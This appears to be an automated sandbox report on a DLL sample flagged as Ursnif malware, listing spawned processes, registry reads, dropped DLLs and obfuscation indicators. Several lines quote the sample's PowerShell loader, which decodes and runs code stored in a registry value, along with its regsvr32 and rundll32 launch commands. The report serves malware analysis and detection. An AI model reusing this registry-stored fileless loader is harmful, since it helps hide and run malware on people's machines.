Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002C.00000002.886760710.0000026782F50000.00000002.00000001.sdmp, csc.exe, 00000036.00000002.914710159.00000138B0E20000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbXP* source: powershell.exe, 0000002F.00000002.962874378.00000251AFDE2000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdb source: powershell.exe, 0000002F.00000002.962727249.00000251AFD82000.00000004.00000001.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbl\ModuleAnalysisCache.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 0000002F.00000002.935651242.00000251AA29E000.00000004.00000020.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001BAC LoadLibraryA,GetProcAddress, 0_2_10001BAC
Registers a DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002120 push ecx; ret 0_2_10002129
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002173 push ecx; ret 0_2_10002183
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04642D8B push ecx; ret 3_2_04642D9B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04629670 push ecx; mov dword ptr [esp], 00000002h 3_2_04629671
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_046428A0 push ecx; ret 3_2_046428A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04E9ABC0 push ecx; ret 7_2_04E9ABC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04E9AF6F push ecx; ret 7_2_04E9AF7F

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
